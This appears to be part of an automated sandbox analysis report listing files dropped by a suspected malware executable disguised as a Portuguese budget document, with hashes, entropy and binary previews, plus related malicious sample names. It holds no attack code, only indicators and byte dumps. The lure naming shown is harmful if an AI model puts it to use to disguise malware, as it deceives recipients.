                                                                                                                                                                                                                        SSDEEP:3072:v1cGJKLh5mhUHnbFvvDbyIGENCzp/Ck3JSgSMtO:dRKL6hyJjZDwpdZSxwO
                                                                                                                                                                                                                        MD5:57942F8C67010250D2611CEC16555152
                                                                                                                                                                                                                        SHA1:520F0297C889EFEAA7DABFCA379638C98C834E92
                                                                                                                                                                                                                        SHA-256:9DA3FDC70176A73642C112C497976E81ED833B6D478EF65C9954F8B04723FC76
                                                                                                                                                                                                                        SHA-512:677E39EE0E5EF52A0C619DB3F4DDC9C378D0B2AF32BB2CE8A8D66A12BB474D66EA43F7EE1313D7FCF294B7C45C4D7CE71438B55122E662C44DE7B043C1E48FAD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:............7F...c...-.5....;.|......G...z.....i............%;.1.+.....P........d...K..=.........q.........3..... ..J...&..%!c.1"...z.....[..d........i........{.......?..._mV...:<m.....s.K...[...u..~...k..B.S..........f........a....j.0\P..O..n.L.*...............O.............L......(#....K.........&.r>....N8..._......@m....~..............=.1H.........;....R.........9...........A.................B....T.'./.. ..............w...<...a..)...@.......+....@......... ........................I...........9.x......`.........(..Nc.............../......x.......6............<.......................s...J...............R....C.>I...6..?...W....S'.....x..........\..9.\......v.g*#.......e.........N..................M...C.}............R....F@.....?.I.......b.........i....I.......1.D.........0..D.g........@..._.....S..x.E....."..8..c.............1... j..P.......G...}...{...s.....s......z.................rj.2.......7..4......P>w.....@3...........u.t..................4......I..~......q....z....O.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):143731
                                                                                                                                                                                                                        Entropy (8bit):4.932449070514557
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:+VEdch8WpNKNKgVV8F5+ezpmQs0VZzPkMhy8Y:+Bh8WpNAKgIzpls0DzPkMhQ
                                                                                                                                                                                                                        MD5:6E6292F29F97CB099E86530BF554070F
                                                                                                                                                                                                                        SHA1:0C2CA75911E7E4EA87CC6FE549BBD114B1BF958E
                                                                                                                                                                                                                        SHA-256:A7F941F4A6D06D1B3956298ADAA5F009F4A34B96B0C373CEC34D371A6A482DE1
                                                                                                                                                                                                                        SHA-512:2703D1BF2BB5BA365ABF833A9F7D7345B097CDF033CA0985A58E6CEE2ECF5A7243CA8055429E11BD4510D21D74CB3F2088E6E9E111C7EC1969DE8DBA9C00F4BE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...!..\.3.P...V...............N....k....i...R........hP....6P.:...........o....4M.....................9.....B.K............q\......*.........4.........ai..Y..D>.G^<..(.........7......I.Q...K.h..i.........................w..A...L.......S.R; ~.0.g.......i..........}............B.....3.......e..a.q.\u............8........W.........K.r......3.........G.P.?)."..........L.........JRF.....RE.k....E.O....1...dG....#......A...>..Z....|^c......S)t.O.w...a...........3....D...t............)............h$lN...6...........!..Z....../..sh.......[....P.3.....1..........................4....e\...P....3..{.........................s...V E..........,.."..........3............b....?...;.%......Z.............t.]...gd.........ho..@\...........g......C...../............[...4....c..................X..U.........a......V.................?...}.......h.c.{...........QR=.f.g.3..........8..nxo.......Q.z.......>...w......e[.X.f.1......s.n....R...)..........3...c.c............... ....t.........r._.:.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):112456
                                                                                                                                                                                                                        Entropy (8bit):4.947252102362902
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:qEdHq0bL67Tj15njc8QBcAPUn2c/IGkjrET:3bL67Tj1VdQHPS2VET
                                                                                                                                                                                                                        MD5:5803B9ED2388D5BE0FDB1CB71C25C24B
                                                                                                                                                                                                                        SHA1:5FCFADF3CF58ABF517555F2C8C0B37EDD6E1624C
                                                                                                                                                                                                                        SHA-256:96FD7A5C9B26669606D551286B38648DEACB025C664BD62102CDED2EC3543D99
                                                                                                                                                                                                                        SHA-512:0401C31CD900FDF9EA2E812ABFA4544F445D4A7521D7E4CC4983441A5E6AA7D4F7F98C05606E0300AE8315EEF9A3F432093345E98D90E4D4B8D49F7A5EB97F14
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..T.w...fT..........P.n...."........O.....Nn..N..LY_.S._..............m...........]...........H#.....................!....U....\.....................P.....r...................C..V.dU..............[...'.S..*.n..~...........H..E...B...h...................Z.;..(..../..'..'.g.........<......|_.../......L.......7.?.'.Q....&.*A.........z.........).............k.q....b..e.qF......b.R..3....U.\..!.....9.....?....}...............8.M.......-.z...S..........j.......w...........7...................X.................7....},c.0.=.)F......F.DG.......n3..y....[$..Ag..P...............t..S.......|..-...T.........|....*..D....M=.......H.......(.}...y;.... Fn...H.......I...?c....@......g..............w...lJR.\......K.C.....'.0q.....C.............+.........,........................h.......~.......=....|.......................Aj..Q......'r......Z0D......~?.........X.....JM.......C....3....0......6.....Us.....SI*..P.........=...........`k....p.t..:..la.....O'......%........A.?.. ......U....x...T..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):181362
                                                                                                                                                                                                                        Entropy (8bit):4.94529009320029
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:QD+CT+IAaYOlQtC9HhXN9KMp0UcUZktgGMGiSq7yX7sHvMpQovElSS463/:CaIAaPaQD7KM1clBM9MLsivTS4s/
                                                                                                                                                                                                                        MD5:F4F5F4A46EF121DBAAA78911C1143457
                                                                                                                                                                                                                        SHA1:60348A97143F5FB9FEED10659490CD63913FD1B8
                                                                                                                                                                                                                        SHA-256:93F1E284240AE539D29AB87F0FE38E5EFED31B1FD701F7C23B65139393F6D29A
                                                                                                                                                                                                                        SHA-512:A35545308259070A52D852A6A217274476BE2737419A2D4A9A8B4427A54844FB982F804563F3D67BDF83FCA699E06F9D0D4DD5CB907CB3267C334F247B2EFCC3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:b...3..z..4.............u......E..$...................=........v3..(........W...h...M...8...!Gm.RB.|..........U..l+.....g/|...n.......qW........>......6.....O..L..................j..../..........N.C.$[...=........>.6...W........o..*.....1...o....}..'............:.}.......................i.?....pC.'c..].......7......~.A..g.D.......^....amv.|...........[....xl.}.....L...F..k.....PC............\x..........G...\.....S..%.....].......................e......=............$.....Dz.........f....9........Q.................P.....2...e.......i...g....7...J..........MO........-.Y.0.:.....w.......Nc..E:..........e....u.......Q....K..v......8p......|+.3...M..?...39.0...a...../................ ......J........&.......n...>Tx..j.P.=..cA....................o.........#.........)..........P.........Q.......F...............DK.........P..~..c..=.....\....-.V...P.q................-..`..........a/.....8..... b........}.A..VN..|y..']..6W....<.....".......~.:....I...~..............U.........V....
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):188689
                                                                                                                                                                                                                        Entropy (8bit):4.943382218928104
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:XaETShy5IJyrhnjzeYXEN059gRDreOGO0udKYrpbNkUHoS+ORnGAq+jYe0KncM:1Shy5IJyrZjzTXE82hFhxJpZNBYe0KcM
                                                                                                                                                                                                                        MD5:134F441414B62AB7CA948B58E3017AAF
                                                                                                                                                                                                                        SHA1:88CFA925BA4D4E7CD5D13E5944286FABA5E75644
                                                                                                                                                                                                                        SHA-256:B03D43C07DD48241794D349DEC1D37DACF9742464F44486011C8E508E5355D2B
                                                                                                                                                                                                                        SHA-512:ECA08F9A8028480818DBAF25856779CE00461B4FF4164EF2C252B72E5683B3E771CBFABB310C92D258E7E2F393FAA2AFAD52E139FCBC49A47E37843FA9E718F2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Hv....B..L..........k.L... .......................?....i.+!.n.......z.......4...........Q..................\..}..yF..}z....o.........K....J.<..;.k....,.=......l..5.....8W....Ch..q..Xc....n..A....o......z.............w.\>5.......u"....}z.9.....}...0...F.....^......L..........j....~....o..0.j..........<9U.W..,....................`5..........U.N.&............H.................8o........u...}.|j........5o............(........#.....%..*Y.....F...........#....i..@.........._............../.m...N.*........$..............Z6.l.......n.[.....l..........t.....ZM........H.......L...4.N...]....4E...........O...a.r......K 1..A.*.e.........................y.n.......o.........E.......M0...nq..... .......2.......b..........8....5...8..Zg.................(...*.a....(.].X.....U....8...$.....u...;k.....@...ir.......@.P.........C.......Bl...l^+.......n..a...b..........[.w._..........:.........P...................I.....i`:......................+...[....[......\..........I.......................!.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):126121
                                                                                                                                                                                                                        Entropy (8bit):4.924502541404553
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:J+FiqRphn5c8pNH2QqqHwsQmZ1+XnsXfcQQ2:JEi4tpNHFg+9/Q2
                                                                                                                                                                                                                        MD5:73F4838D977B5E3A41711BF116751EE4
                                                                                                                                                                                                                        SHA1:3948F80F2EDB3A0DCF36F7895FA876A0FD74E27D
                                                                                                                                                                                                                        SHA-256:D496A5F5BE15B913F71197205F6DF9D2E9A91936A735000E1B4A67097486068C
                                                                                                                                                                                                                        SHA-512:ECEFA9C897B167542281960EAEE0D3E7901280A1A3FC4C69D6FCB827C8F6F6DD5FCD56537E7E034148084E6FD044D0F816829E00A2BF025D8801BCBF10BFEE02
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:~......2....P%....hAI.......A../.. .@.P.....\...R].;................8$....f..g..Z......D.....a........s....).......v/...........y<&........`........\....\..#.......B......Y`..........<n...m.~K........5...+..u....X.`. .......$....{...[.....W...E......r...e.....v..M..Z........>............q....L...*=M'....c../...h,....W..,.........AC..K....i............g......~..%.............3...{...........k...........................................;.....:(...........t....X *...&.......r......N..s..........ZPY...._C.s\........O.?.....8...2...........l.../......F.......I....Bs...T+...)..Y.S..I. .}..............sM....................:l.!]r.l..l.........o.........V..........*7N..N..:...g....C.................t.d2............wV.~...].......;s...............d.+|..................(............Q.....u<..V.....+....4...X......o..96.y.........I~................?.......,.|....M..9T..e.a..K.F.|...D.J........A....n..2M....\......$-..9.......Zk..M.G.m.......O........4...........4;...............
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):199997
                                                                                                                                                                                                                        Entropy (8bit):4.95049480511275
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:NxLhJXks/x6CeXlKjvC9bbHoF4TDa/t69bMFzoDgF85RcXqWdRi16gLp:NF/XfQ1lIga/tabMFz+cXqUKj
                                                                                                                                                                                                                        MD5:9AF958045DC9DE8AB158CC95776D6495
                                                                                                                                                                                                                        SHA1:CEAB6CA9E6A7EED0E90DB72014BAAB2EED6A9768
                                                                                                                                                                                                                        SHA-256:3C58A0C27D970C03989F2BC77DD6DD04C9D81990789117F82764FAF2E399B5D1
                                                                                                                                                                                                                        SHA-512:AC246B614D4D91683517BF253803D8B2D5026B059350B97FAA8787D1AB2E2C26C71DFD9E6146EEEAF702437D4AC5B225B1D691ADC093ED92A3936D88118604B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.....(........F.T..+.y...<......k....,k/..........6=."l..2.i.......}..=\......-....qh..6...G-........_k.....0.................................[...p....r...;....W.......R.O1............)W..m..O!.......j.............vy...[..u...........`z.........................b..M...s.,......7.>^....L.x.8...........J..............dJ..?....8.?.........mG!.=.i...g...h.N.......eE...(....%...........8......'..4................6..lp:a.......~.......K.N.FN..<..............2........T........'.DX... .................z.............w..%......f.5....h.....f........i........i......T..V..............._.q..w.......#...cG>..E..G......8>...............1..(.....sD.......>.cA..=..]y..(..u....|Y....D...........i........2..u....].s....7..*.R...........z........g....Q7..E...0.y..............N.....uT.....a*N................7...K.....BR..........E.....+@k........:....6....c,X............K...|;....$............5.%..........8m.oGZ..>...............s...=....{..........2..H..*...4....>........S..|..Y......y........
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):172337
                                                                                                                                                                                                                        Entropy (8bit):4.930290634445037
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:AD7h/7PXM0G0TPtNBXQ20fKlwFKCxaE3Qey+HnsYAIFw:AD7h/DM0Bf0nFlWoo0w
                                                                                                                                                                                                                        MD5:9AFCEEB728EA02955A15C79DA11CD3B8
                                                                                                                                                                                                                        SHA1:DBC38A717BFB6C6A7968218F6CD8B57816C2E0F3
                                                                                                                                                                                                                        SHA-256:FD2D705F2B616074B9A68B647663D8CAB5C7B59EA05054D26DF85DF4F9454A61
                                                                                                                                                                                                                        SHA-512:F842087F98EA5712504F46FC5A020D4DDEAE6C12FE989C3154C98F349BD9F398CB3B8B0EEE69B2215BD81C2AF1910D98785F500D61BFD46616072D35DCEF3E28
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...FV.......=.T.j.."}e......~.p..........................{FT.{.W..g......`......^..i..............Z.....}.....$E...........b...........c...P...l.e...Z.h...................t.........!U......|......."pa...........`....Y.........$...E..........~..kp...;.."...o.........`......&.........Vf................"..@..]C....$T...V..R......s......h...Gl6..'......9....x.|.........................".L(........M.....v...;.,..z3..<............#...N.7G.d..|3..t.I...n.....h}.{..`.0..".....@...@. .....1....$...........a..i....mz<.....E........].|.....SX....m...............3......../.g.W...$....f......e.].......[.........@..YxH.3\..v....W.iR..0.q...V.2...&...e..4E.5.......v.........v..........1.... ...........d.......`.?..s............W.38p.............p.+.....2...w.......m..r.....y...Kq......vJ.................wbS........T....U1......F._........!.0..-.#.....*......}.U..F..Ed.)................>$.r~.........+.O..e.b...<..........V.......7T........O.Q.Z......}...w.6.B.t........i|.....bus...........
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):107849
                                                                                                                                                                                                                        Entropy (8bit):4.949054522185106
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:8Be1lMJzDg6Zb3bv72VATF1xj2jiC8YRVWN:2e1lIRxGVAT/IYoVWN
                                                                                                                                                                                                                        MD5:E7A692F50EBE0758632CC700DAD8BC10
                                                                                                                                                                                                                        SHA1:34B33DAD733C782A30143D6842A4AA43EF028B80
                                                                                                                                                                                                                        SHA-256:C0CA200B4352018F1326951C065582598BE249596E7E782EAD1C2038B9C02EFE
                                                                                                                                                                                                                        SHA-512:E0A9AA37B7CD1AC0FE2A91BC17A92B1F6CF381640BBB4961AA1C2B2A3B8E647669FE99DD6177CAF19E4C108C392B624FBF70FA9D77A1534630780E4D533C1363
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:f.&..=.ha.~..U...........(........|.......?.....h...`...v....4..;D.j...@..M.@..2......O......N.}.1...@.Y............l. .....*.....H...U..<.. ..............l....5................U6...........@.....p.i........W...K...]{...................,..[..^....}........k..'...e.....<..........R....W.....`....b,..`..t.....e................R.z!x..............(..B..............W......K....ew..|.N............u.....R.X....B.....]....j....H...C............|U.....;......$......+............k...~..C....J................<...9.....................O.p...-.....f....I...........K=<..... /.....f.....d..x.ly..+..../....................9...1w.x1..1...{.O.,.....S......D..Ql...../......o..E...........6.........nXZ.v......F.................4...Y.c.....@....>m... ...]....J.M....{..........J...n.....2....4.(..7......cW.....p.........).................E........=.-.G......s..|............3....U...../..{..G.........A....7..AS.7.4.h..........A.....A.....(....B....R.......E..0.U.l...D..V...................Z...
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):151901
                                                                                                                                                                                                                        Entropy (8bit):4.922047081618049
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:ZXNcFVdShVO5SKJxJK7mR65fq573pIrSMHv3Rh8wfpzCrIn5w+lXc:ZXUdJX6mM5SJmGMHvH5cTn
                                                                                                                                                                                                                        MD5:E56C98FFF0A57A36E95D1CFEE82E7146
                                                                                                                                                                                                                        SHA1:19917AE2B55DB15294780E209BED73B23EF39DDA
                                                                                                                                                                                                                        SHA-256:AFA757D9209092F3734EEA02CD4797BEE3E385D7FE6541B7483F9C3A04250C2C
                                                                                                                                                                                                                        SHA-512:7D65EBF87F16E4C13F81E5BB333C8B0B71D3A09EEFAAB25A63741D20ACC786561F76D063000E5710B55461F2BAE6A6CA5154EA083B501D105A76400B5FE4C372
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.....X...r.s.....Y..*........E.X...v...gs....a(..9..]3.'..................{.........X..................NJ........7..0..............9..*o..................{..........[..............c............3.M{.e...@..9........L.Q..r.,.....o...W.............{A.P...................7..........n...e.1,e......y..........f....@d..T=..J.E......,....:..L......U......E...........A..9.=....z.F......2....4....u..9....{...........S6.....0....S...............L.....!.......B...#[...^.......N....i......`..y.....e.......d.............|.w........x......6.........H./..._.............0...8....M.M-..U......~....\.......%....."....~....G.....s.....k%........M..x..5....C.........8............g...qy.'......{5....X.=....i......$.rS.......v.....1.s..^..........v....@...........t...Z..Jk.....Q......Ab.....*....1.......AO...1%...o.h....S....6........*......".IK.../....%..w..............}..Gq........N..... .....r.......VY..._..........h..........N...........E.P...._.u...........n......?.eR.........@.d[}.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):115315
                                                                                                                                                                                                                        Entropy (8bit):4.933716169936108
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:yoWq3doKVKbYeTjqsdmN0Yp+G51TlB4RVSNYj8:yeINdmN0A+G5TB46f
                                                                                                                                                                                                                        MD5:8E72C193AF73C259F423EE05499B566B
                                                                                                                                                                                                                        SHA1:17EF3655823771E35959D0F7DAEF7D130B7E2FBC
                                                                                                                                                                                                                        SHA-256:3A5656609CDA0708F8F76EBC101ABD223685ADD36C8BCFC36B85F7C247F4661E
                                                                                                                                                                                                                        SHA-512:7D42C95773BA148BE5551E2807E2850E944558FF2449F207434E78C00F0384A4BC99AB88A84C8CE477C54A46A9A99A3235B00DCCCAC94A5850424AACA2923C4B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:t...............@..]...E.....^..Q.w7.o.......#/...@J...................c..q...J......x......B..^...4........c........q)...t../0.(..T......p...........{........_...........L>.L.j..a.......g.........(:p~.~.......L.]ax.....M...........i?..!..^.....~...k...f..;....................o......=..........l..........u.....r.!.65.........:........>...(.....1.....*...............w......a...A.....?....................`.........H...w)..Z ."...s..........Q..Z...............m..W..a............g..%.........v........<.../........H.......3...G...U...C}..:.....}F.#.........%.........o....7...........6.q......!d................j.~,..D.B....f......i.]...Y.........0.......a..O..*.....*...[....<......R.....EqK...............v.........b....5......|M....ln.......,G.E...J......T..g...p0.....t...?.......).......Zw.......a...2............................&... ...).......j.?.......r#..........Y..M.u.h......../.T?.............x....o..7...I..............Z...........n...............T....'...........2..)..U...
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:DOS executable (COM)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):169527
                                                                                                                                                                                                                        Entropy (8bit):4.952881044983686
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:qzve04Mp9bVwS7h0cs0oRoVQzOsxdMh6Kh4q9FfQ7P:qzve0469bVp7+cs0oRoVQFMFz9lQ7P
                                                                                                                                                                                                                        MD5:9C02DD0CDE6224AF894B17AE3C345FBC
                                                                                                                                                                                                                        SHA1:4D5E753B3EE5F52549ADD9E60180E2534DA32484
                                                                                                                                                                                                                        SHA-256:49DCDF0CE96754B433C373ADBBA4B5B8B048F7E5DD1A0F9424500B79636D4722
                                                                                                                                                                                                                        SHA-512:E4B47319460911D3CAD2BA9D433C2B8C4AED414A5E85F7B427CA8E0AC0436CCF99C0D46BFDF1D8695C14F6EB06447961545837B23081E392F77796FCC243EEF1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:...|..[...Q......o........w........)..............6.....e..).>..#.S..@....#................[A.....1......G........^..N`+.....R....9.........'.o......,..............J...................H .......x.....g...Q...7..8.'........Q..^...Y..$....^f..r....?..;.E......o.wG.........x...............e..:=.........m..9...J..)%.ZV....?...C;.p.........>..=#......5T.............v3..=.c.............[......./...............$...=............v....?...........6....C...|....CQ.z.V?".P/...................Q..x............].....r`.h.....\........m......?.....3.......B..[....\.a.;.c.&........U.-..I.....:...)..1................G...U..f......q..}....m...........y..IB.m..m.....b...V..a...?..P..S......S..IE.......].............i.....l...w1.{...t....k........:........W-.&....wU....R..........Z;j........8...:.......,.[.........!.q.._0.......l..\..................^.T..........1........W.D..i....*........+}.....@..h......\.....\.D.....ns+@...r..........a..c....L...r......\..@.....................%.....C..........
                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xaee0e847, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):41943040
                                                                                                                                                                                                                        Entropy (8bit):1.322362924054778
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:udzcCurHZiy64/tPcfY9MkJvEycmNjEmVTPDQgGE3g9jo7Wxj8Wgkvg/JC7xvhu8:1rHZiyKfY9leSPDQgGFgZSu2
                                                                                                                                                                                                                        MD5:49CCD66C2B8910186066D08332DF1ABF
                                                                                                                                                                                                                        SHA1:3FE5A95D2B8A6CDA8C096FF1F4B1796E9F8223EB
                                                                                                                                                                                                                        SHA-256:451C707D9806C5B7EEFDAE81D345D8327799D38D8E6F58D809965A2FDEF21DCE
                                                                                                                                                                                                                        SHA-512:88DC7AD021E0C9141513E65B10B75603951939736AF7FF67D3A47A3D2324870DC2D567E6C0F9169488068FFCACF1CB6537C8CD8DAB95138810A534C968E5B3E4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...G... .......(............*...y......................Q...@....+...{...,...{..h...@.........................Be ....y7.........................................................................................................bJ......n...............................................................@...@....................................... .......&....{e.............................................................@...........................................................................................................................N...:....y!.....................................,...{.J...................(.,...{..................@........#......h...@...................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):7680
                                                                                                                                                                                                                        Entropy (8bit):5.220213965432121
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:8e3k1LFJaO1/radJEaYtv1Zs4lkL8y3A2EN8Cmy3uTF4j7J3kWyy/:t0TJa2roqJyA2EN8diuTSje
                                                                                                                                                                                                                        MD5:5DA88848798426643F9810237B58937D
                                                                                                                                                                                                                        SHA1:E1830DCA870437116B93DECBA8D0BA81F1056D65
                                                                                                                                                                                                                        SHA-256:27D3E3E359E1E04B173277221055D043E2F3BAAF78A5D6F7E3A0A5DFCB96222C
                                                                                                                                                                                                                        SHA-512:859D0FEF023B6FB9C41589E4AA5BCFC23259639AAAD2FB51E1304725D6E28852BD6B6A68FFCA8C6A20ADAE4D735E6A03620890036ED57095F40318804153F586
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....z.W...........!................"........ ...............................`.......................................$....... ..d............................P....................................................... ...............................text...D........................... ..`.rdata....... ......................@..@.data........0......................@....reloc..v....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                                        Entropy (8bit):5.6557532861400945
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA
                                                                                                                                                                                                                        MD5:0FF2D70CFDC8095EA99CA2DABBEC3CD7
                                                                                                                                                                                                                        SHA1:10C51496D37CECD0E8A503A5A9BB2329D9B38116
                                                                                                                                                                                                                        SHA-256:982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B
                                                                                                                                                                                                                        SHA-512:CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: FhmDxxpEZM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: FhmDxxpEZM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: FfpHp8F4pY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: FfpHp8F4pY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: mgtq5agGDy.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: mgtq5agGDy.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: AlKwm5EGna.exe, Detection: malicious, Browse
